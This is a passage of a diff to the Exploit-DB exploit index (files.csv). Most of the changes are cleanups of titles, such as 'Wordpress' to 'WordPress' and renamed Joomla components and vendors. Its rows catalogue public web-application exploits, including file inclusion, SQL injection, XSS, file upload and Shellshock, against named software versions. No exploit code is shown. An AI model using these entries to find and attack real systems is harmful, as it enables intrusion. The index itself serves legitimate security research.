Tool - b2mail.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29907,platforms/php/webapps/29907.txt,"Comus 2.0 - Accept.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29908,platforms/php/webapps/29908.txt,"TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion",2007-04-25,s3rv3r_hack3r,php,webapps,0 +29908,platforms/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion",2007-04-25,s3rv3r_hack3r,php,webapps,0 29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - config.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - action.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - APB.php Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 +29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 29914,platforms/php/webapps/29914.txt,"Doruk100Net - Info.php Remote File Inclusion",2007-04-26,Ali7,php,webapps,0 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0 29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0 @@ -30858,8 +30860,8 @@ id,file,description,date,author,platform,type,port 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0 -29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 -29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0 +29960,platforms/php/webapps/29960.txt,"SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 +29961,platforms/php/webapps/29961.txt,"SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - index.pl Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 @@ -31200,7 +31202,7 @@ id,file,description,date,author,platform,type,port 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 -30637,platforms/php/webapps/30637.js,"Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 +30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 @@ -31252,7 +31254,7 @@ id,file,description,date,author,platform,type,port 30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 - 'index.php' Local File Inclusion",2007-10-20,sekuru,php,webapps,0 30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module - Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,php,webapps,0 30699,platforms/php/webapps/30699.txt,"Hackish 1.1 - Blocco.php Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0 -30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 +30700,platforms/php/webapps/30700.txt,"deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - download.php Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 @@ -31804,9 +31806,9 @@ id,file,description,date,author,platform,type,port 31581,platforms/php/webapps/31581.txt,"PHPGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps,0 31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' Parameter SQL Injection",2008-03-31,RMx,asp,webapps,0 31584,platforms/php/webapps/31584.txt,"Terracotta - 'index.php' Local File Inclusion",2008-04-01,"Joseph Giron",php,webapps,0 -31587,platforms/php/webapps/31587.txt,"EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 -31588,platforms/php/webapps/31588.txt,"EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 -31589,platforms/php/webapps/31589.txt,"EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 +31587,platforms/php/webapps/31587.txt,"EasySite 2.0 - 'browser.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 +31588,platforms/php/webapps/31588.txt,"EasySite 2.0 - 'image_editor.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 +31589,platforms/php/webapps/31589.txt,"EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0 31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0 31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - admin.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 @@ -32275,7 +32277,7 @@ id,file,description,date,author,platform,type,port 32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0 32297,platforms/asp/webapps/32297.txt,"Smart Survey 1.0 - 'surveyresults.asp' Cross-Site Scripting",2008-08-26,"Bug Researchers Group",asp,webapps,0 32298,platforms/php/webapps/32298.txt,"HPSystem Management Homepage (SMH) 2.1.12 - 'message.php' Cross-Site Scripting",2008-08-26,"Luca Carettoni",php,webapps,0 -32299,platforms/php/webapps/32299.txt,"MatterDaddy Market 1.1 - 'admin/login.php' Cross-Site Scripting",2008-08-26,"Sam Georgiou",php,webapps,0 +32299,platforms/php/webapps/32299.txt,"MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting",2008-08-26,"Sam Georgiou",php,webapps,0 32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 - 'search.asp' Cross-Site Scripting",2008-08-26,JoCk3r,asp,webapps,0 32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 - 'adv_cat.php' Cross-Site Scripting",2008-08-27,"Bug Researchers Group",php,webapps,0 32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 @@ -33137,7 +33139,7 @@ id,file,description,date,author,platform,type,port 33934,platforms/php/webapps/33934.txt,"eZoneScripts - Multiple Scripts Insecure Cookie Authentication Bypass",2009-02-09,JIKO,php,webapps,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,cr4wl3r,php,webapps,0 -33937,platforms/multiple/webapps/33937.txt,"Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 +33937,platforms/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,cp77fk4r,java,webapps,0 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",php,webapps,0 @@ -33162,12 +33164,12 @@ id,file,description,date,author,platform,type,port 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Inclusion",2014-07-07,Vulnerability-Lab,ios,webapps,0 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 -34003,platforms/php/webapps/34003.txt,"Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34004,platforms/php/webapps/34004.txt,"Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34005,platforms/php/webapps/34005.txt,"Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34006,platforms/php/webapps/34006.txt,"Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34005,platforms/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34006,platforms/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 -34008,platforms/php/webapps/34008.txt,"Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0 34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 34014,platforms/php/webapps/34014.txt,"Web 2.0 Social Network Freunde Community System - 'user.php' SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 @@ -33207,7 +33209,7 @@ id,file,description,date,author,platform,type,port 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 -34087,platforms/php/webapps/34087.txt,"Joomla! Component 'com_youtubegallery' - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 +34087,platforms/php/webapps/34087.txt,"Joomla! Component Youtube Gallery 4.1.7 - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0 @@ -33348,7 +33350,7 @@ id,file,description,date,author,platform,type,port 34291,platforms/php/webapps/34291.txt,"Joomla! Component 'Rapid-Recipe' - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0 34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Parameter Cross-Site Scripting",2010-07-12,"David K",java,webapps,0 -34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 +34294,platforms/php/webapps/34294.txt,"WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34298,platforms/php/webapps/34298.py,"CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 @@ -33384,7 +33386,7 @@ id,file,description,date,author,platform,type,port 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 34370,platforms/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0 -34374,platforms/php/webapps/34374.txt,"Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0 +34374,platforms/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0 34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0 34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2010-10-04,Abysssec,php,webapps,0 34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI - Cross-Site Scripting",2009-12-04,anonymous,php,webapps,0 @@ -33423,7 +33425,7 @@ id,file,description,date,author,platform,type,port 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat Parameter) SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 -34424,platforms/php/webapps/34424.txt,"Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 +34424,platforms/php/webapps/34424.txt,"WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 34432,platforms/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 @@ -33455,7 +33457,7 @@ id,file,description,date,author,platform,type,port 34472,platforms/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34473,platforms/php/webapps/34473.txt,"Property Watch - email.php videoid Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 -34475,platforms/php/webapps/34475.txt,"Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 +34475,platforms/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0 34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0 @@ -33746,7 +33748,7 @@ id,file,description,date,author,platform,type,port 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps,0 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 -34922,platforms/php/webapps/34922.txt,"Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 +34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 @@ -33978,7 +33980,7 @@ id,file,description,date,author,platform,type,port 35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35285,platforms/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35286,platforms/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Parameter Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 -35287,platforms/php/webapps/35287.txt,"Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 +35287,platforms/php/webapps/35287.txt,"WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80 35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 @@ -33987,7 +33989,7 @@ id,file,description,date,author,platform,type,port 35294,platforms/php/webapps/35294.txt,"Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0 35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80 -35303,platforms/php/webapps/35303.txt,"Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 +35303,platforms/php/webapps/35303.txt,"WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection",2011-01-31,"AutoSec Tools",php,webapps,0 @@ -34020,7 +34022,7 @@ id,file,description,date,author,platform,type,port 35341,platforms/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 -35346,platforms/php/webapps/35346.txt,"Wordpress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 +35346,platforms/php/webapps/35346.txt,"WordPress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 @@ -34076,7 +34078,7 @@ id,file,description,date,author,platform,type,port 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 -35447,platforms/php/webapps/35447.txt,"Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 +35447,platforms/php/webapps/35447.txt,"WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 35451,platforms/php/webapps/35451.txt,"BoutikOne - categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35452,platforms/php/webapps/35452.txt,"BoutikOne - list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35453,platforms/php/webapps/35453.txt,"BoutikOne - search.php Multiple Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 @@ -34454,7 +34456,7 @@ id,file,description,date,author,platform,type,port 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum (SMF) 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 -36086,platforms/php/webapps/36086.txt,"Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 +36086,platforms/php/webapps/36086.txt,"WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 36087,platforms/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 36090,platforms/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0 @@ -34474,7 +34476,7 @@ id,file,description,date,author,platform,type,port 36108,platforms/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36109,platforms/php/webapps/36109.txt,"Mambo Component N-Myndir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 -36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 +36112,platforms/php/webapps/36112.txt,"WordPress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 @@ -34702,7 +34704,7 @@ id,file,description,date,author,platform,type,port 36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 